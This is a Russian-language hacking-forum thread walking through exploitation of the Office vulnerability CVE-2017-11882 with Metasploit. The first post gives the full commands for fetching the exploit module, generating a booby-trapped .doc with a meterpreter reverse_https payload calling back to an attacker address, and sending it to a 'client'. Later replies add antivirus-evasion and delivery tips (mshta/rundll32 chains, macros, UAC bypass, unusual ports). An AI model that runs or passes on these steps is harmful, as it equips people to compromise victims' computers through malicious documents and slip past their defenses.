HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.11.2017, 16:37
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Добрый день.
Один доллар (@OneDollar)показал пример эксплуатации уязвимости через Empire Powershell

CVE-2017-11882 или Взлом с помощью безобидного документа


Мы рассмотрим альтернативный вариант через Metasploit:
Скачаем и перенесём експлоит

Код:


Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
Запускаем metasploit и выбираем наш модуль.

Код:


Код:
service postgresql start
msfconsole
use exploit/windows/fileformat/office_ms17_11882
Просмотрим информацию о модуле

Код:


Код:
info


Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?

Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой

Код:


Код:
set FILENAME /root/exp.doc
Можно поставить и *.rtf, отработает и так и так.

Добавляем пейлоад и запускаем

Код:


Код:
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit
Собственно, всё.
Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
Запускаем, ловим сессию.



AV так же не стоит на месте
https://nodistribute.com/result/BUZqx1mACKldLr3
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)

Информация дана для ознакомления, спасибо за внимание)

Альтернативный вариант пост эксплуатации через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа
 
Ответить с цитированием

  #2  
Старый 27.11.2017, 13:59
z3r0c10wn
Новичок
Регистрация: 04.09.2017
Сообщений: 0
С нами: 4573785

Репутация: 0
По умолчанию

Test - windows defender with last updates \ Windows Office unpatched -
Дефендер палит нагрузку но уже после выполнения через memory corruption. Соответственно сессию создаст. Хотя сделает вид что запалил.
 
Ответить с цитированием

  #3  
Старый 27.11.2017, 14:11
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

За всё время тестов любого ПО я понял, что сессия meterpreter странный предмет, вроде и создана, а вроде и нет =)
 
Ответить с цитированием

  #4  
Старый 27.11.2017, 21:23
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Windows 8.1, Windows 10 - Все Last Update, дефендер уничтожает полезную нагрузку.
 
Ответить с цитированием

  #5  
Старый 28.11.2017, 08:09
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Цитата:

Vander сказал(а):

Windows 8.1, Windows 10 - Все Last Update, дефендер уничтожает полезную нагрузку.

и это печально)
 
Ответить с цитированием

  #6  
Старый 29.11.2017, 21:07
ivanov-sv-2015
Новичок
Регистрация: 27.01.2017
Сообщений: 0
С нами: 4890679

Репутация: 0
По умолчанию

При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?
 
Ответить с цитированием

  #7  
Старый 29.11.2017, 21:28
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Цитата:

ivanov-sv-2015 сказал(а):

При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?

Пха-ха) а о внесении изменений в документ я и не задумывался)) действительно сессия не прилетает)
ну ничего) пройдёт неделька, другая обязательно появится решение)
 
Ответить с цитированием

  #8  
Старый 30.11.2017, 13:42
z3r0c10wn
Новичок
Регистрация: 04.09.2017
Сообщений: 0
С нами: 4573785

Репутация: 0
По умолчанию

Если уж играться с последними АВ и другими средствами защиты винды 10ки- стоит обратить внимание на такие классические вещи которые работают как молоток
если говорить за metasploit - exploit/multi/script/web_delivery
если говорить за другие варианты - cmd->mshta->rundll32
Способы доставки - прекрасный макрос в доке работает по прежнему хорошо.
После получения консоли, можно осмотреться в системе и уже пробоваться варианты обхода UAC если есть\ либо другие варианты повышения привилегий. Ну или прогрузить уже другую удобную вам консольку к примеру используя регистрацию в реестре или еще 100500 разных техник.
Но выше указанные две техники на удивление срабатывают там где палятся более сложные на каком нибудь IPSe

______________________________
И еще стоит юзать динамический пул портов. Зачастую много правил фаерволов блокируют все левые не зарегистрированные сервисы на портах до 10 000 . Поэтому вибираем что то в стиле 46553 и уперед!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.